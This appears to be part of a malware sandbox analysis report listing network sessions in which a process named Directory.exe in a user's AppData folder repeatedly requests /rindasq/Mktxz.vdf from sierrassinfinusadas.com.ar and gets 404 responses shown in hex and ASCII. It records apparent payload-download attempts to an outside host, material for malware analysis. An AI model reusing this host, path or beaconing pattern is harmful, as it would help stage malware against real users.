                                                        2024-11-21 11:58:10 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.650129167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:12 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:12 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:12 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:12 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.650131167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:14 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:15 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:14 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.650133167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:16 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:17 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:16 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.650135167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:18 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:19 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:19 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:19 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.650137167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:21 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:21 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:21 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:21 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.650139167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:23 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:23 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:23 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:23 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.650141167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:25 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.650143167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:27 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:27 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:27 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.650145167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:29 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:30 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:30 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.650147167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:31 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:32 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:32 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:32 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.650149167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:34 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:35 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:34 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.650151167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:36 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:37 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:37 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:37 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.650154167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:40 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:41 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:40 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.650156167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:42 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:43 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:42 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:43 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        90192.168.2.650158167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:44 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:45 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:45 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
